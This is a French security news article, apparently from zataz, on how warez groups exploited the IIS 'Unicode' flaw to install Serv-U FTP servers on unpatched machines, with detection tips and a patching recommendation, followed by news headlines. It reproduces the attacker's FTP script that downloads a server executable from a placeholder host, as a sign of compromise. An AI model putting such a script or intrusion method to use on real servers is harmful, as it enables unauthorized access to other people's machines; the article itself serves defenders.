Depuis 1999, une faille visant les serveurs IIS de Microsoft permet, avec une simple ligne de code, d'accéder au disque dur d'un serveur connecté au réseau. Les groupes de warez ont trés vite compris l'utilité de ce probléme.
Depuis 1999, une faille visant les serveurs IIS de Microsoft permet, avec une simple ligne de code d'accéder au disque dur d'un serveur connecté et non patché face à cette faille communément appelée Unicode. Un simple ligne de commande lancée dans votre logiciel de navigation et il est possible de modifier l'ensemble du contenue des disques durs d'un ordinateur équipé d'un serveur web IIS. Pour vois si votre serveur est faillible, nous vous proposons d'ailleurs notre logiciel ZunicoZ qui vous automatise cette recherche d'un clic de souris. Après la médiatisation de cette faille,
due entre autre par le virus code red, on aurait pu penser que cette faille avait certainement disparu du réseau. Et bien détrompez-vous, elle est toujours aussi présente et certains logiciels, comme "nicode", permettent de scanner l'Internet à la recherche de ces serveurs si facile à pénétrer. Cette possibilité est utilisée par les groupes de warez qui ont vu, certains de leurs membres, se spécialiser dans le piratage de serveur IIS.
Sesame, ouvre toi !
Le principe est simple. Le pirate prend une adresse ip d'un serveur sensible à cette faille. Des listes circulent, souvent fournies par les scanneurs des groupes de warez. Grâce àune dizaine de commandes envoyées au serveur, cela va permettre de télécharger sur la machine cible, un serveur ftp (Généralement serv-u.exe, ndlr) ainsi que sa configuration comprenant généralement deux comptes : Le premier, celui de l'admin. Un compte qui donne les droits complets d'accès. Un accés uniquement diffusé aux "Supplyers", les fournisseurs/diffuseurs de la team warez.
L'autre compte offre seulement la possibilité aux internautes de télécharger les releases (Jeux, logiciels, films ou albums piratées, ndlr.). Il ne peut rien effacer, ni modifier. Les teams warez peuvent ainsi utiliser des DD de plusieurs dizaines de giga octets sans craintes de laisser une trace. Celles-ci seront effacées par un membre ayant un accès admin.
Faites donc attention, si votre ordinateur est équipé d'un serveur IIS, vous hébergez peut-être déjà des logiciels piratés a l'insu de votre plein grès.
Solution et dépendance
Voici quelques solutions pour repérer si une quelconque personne a tenté ou mis un serveur ftp sur votre ordinateur.
Pour son confort le pirate va copier le fichier cmd.exe, initialement dans winnt/system32, vers le dossier /temp/ avec comme nom cmd2.exe.
Si vous trouver cmd2.exe dans le répertoire /temp/ il semble que quelqu'un a déjà eu accès à votre machine. Toujours dans le répertoire /temp/ vous pouvez trouver un fichier texte ayant cette forme:
open "ftp.adresse.com"
user "login"
"pass"
get nomduserveur.exe
get nomdufichierconfig.ini
quit
Les termes entre guillemets sont bien sur dépendants du pirate. Dans 90 % des cas vous trouverez le mot leech en login, voir même en mot de passe. Vous avez ici le fichier qui va permettre au pirate de faire télécharger au serveur web le serveur ftp ainsi que sa configuration sur un compte ftp. (Généralement le ftp sera celui d'un hébergeur gratuit, ndlr)
Les fichiers précédents vont être télécharger dans c:\Inetpub\scripts. Si vous trouvez dans ce répertoire les fichiers précédents, il faut les supprimer. Attention, cela ne règle que temporairement le problème. La meilleure solution étant bien sur de patcher votre serveur avec le correctif disponible sur le site de Microsoft. Pensez à lancer une recherche sur votre machine, car ces programmes peuvent être installés autre part.
Une autre méthode pour savoir si votre pc n'est pas transformé en ftp pirate. Recherchez les mots suivant : mp3, divx, xbox, ps2, warez, iso, appz. Une autre recherche sur le terme serv-u pourra vous éclairer un peu mieux sur une éventuelle visite warezienne. Bien sur, les plus malins auront modifié le nom du fichier en wazzaaa.exe ou un nom encore plus difficile à détecter, comme systems.exe.
25-05-2012 à 13:05 - 1 commentaire(s)
Info zataz - Des dizaines d'hébergeurs sous le contrôle d'un Anonymous Français. Il déclare la guerre aux serveurs privés Dofus.
24-05-2012 à 12:09 - 0 commentaire(s)
Info zataz - Une vague de faux messages vise des milliers de comptes Français Facebook. Prudence aux photos sexy diffusées.
22-05-2012 à 00:43 - 0 commentaire(s)
Info zataz - Un iPhone jailbreaké couplé avec Tweak Bulletin permet de passer outre le mot de passe d´ouverture du téléphone.
22-05-2012 à 00:38 - 0 commentaire(s)
Le fabricant chinois de téléphone portable ZTE a confirmé la présence d'une porte dérobée dans l'un de ses smartphones sous Android.
22-05-2012 à 00:31 - 0 commentaire(s)
Info zataz - Des milliers de données sensibles volées par des Anonymous au Bureau of Justice US.
22-05-2012 à 00:09 - 0 commentaire(s)
Info ZATAZ : Plusieurs dizaines d´informations concernant des pédophiles présumés venant du réseau Darknet diffusées par des Anonymous.
20-05-2012 à 20:38 - 0 commentaire(s)
Info zataz - Des failles découvertes sur les sites des magazines FHM, ELLE et Forbes peuvent mettre en danger les lecteurs internautes.
20-05-2012 à 20:28 - 0 commentaire(s)
Info @zataz - Le gouvernement Québécois veut faire interdire des manifestations étudiantes. Les Anonymous répondent en lançant des attaques informatiques.
Kim DotCom, le créateur de MegaUpload vient de récupérer sa Mercedes de 250.000 dollars et 20.000 dollars de cash.
Sony met une copie pirate de son film Millenium dans ses boites commerciales.
Un groupe d'écrivains chinois dépose plainte contre Apple. Les romanciers accusent l'App Store d'avoir piraté leurs œuvres.
Un internaute belge passe sous le rouleau compresseur de 50 associations liées aux droits d'auteur. Il écope de 65.000 euros d'amende.
INFO ZATAZ - Le DVD de La vérité si je mens 3 diffusé en version pirate sur la toile. Une rumeur parle d´une version pirate pour CLOCLO.
INFO ZATAZ - Le site Pro ZIK, spécialisé dans le rap et les musiques urbaines fermé. Son webmaster entendu par la police.
400.000 livres contrefaits, voilà ce que proposait le site library.nu. La police vient de lui fermer son sommaire.
4 mois ferme, plus de 77 000 euros d´amende. Sept pirates de film du nord de la France condamané par le Tribunal de Béthune.
Timeline : Vulnérabilité découverte par Aaron Sigel Publication coordonnée de la vulnérabilité le 12-10-2011 PoC Metasploit fournit le 16-10-2011 PoC fournit par : Aaron Sigel sinn3r Référence(s) : CVE-2011-3230 HT5000 Version(s) affectée(s) : Safari 5.1 pour Mac OS X v10.6.8 Safari 5.1 pour Mac [...]
Metasploit fournit des modules auxiliaires pour la base de données MySQL qui vous permettra de détecter la version du moteur de base de données, d’effectuer des attaques du type “brute force” au niveau de l’authentification sur la base de données, d’executer des requêtes SQL et de récupérer des [...]
Metasploit fournit des modules auxiliaires pour la base de données PostgreSQL qui vous permettra de détecter la version du moteur de base de données, d’effectuer des attaques du type “brute force” au niveau de l’authentification sur la base de données, d’executer des requêtes SQL et lire des [...]
Timeline : Vulnérabilité découverte par Jason Bowes et soumise à ZDI Notification initiale de ZDI vers le fournisseur le 23-09-20102 Publication coordonnée de la vulnérabilité le 19-04-2011 PoC Metasploit fournit le 04-08-2011 PoC fournit par : juan vazquez Joshua Abraham sinn3r Référence(s) [...]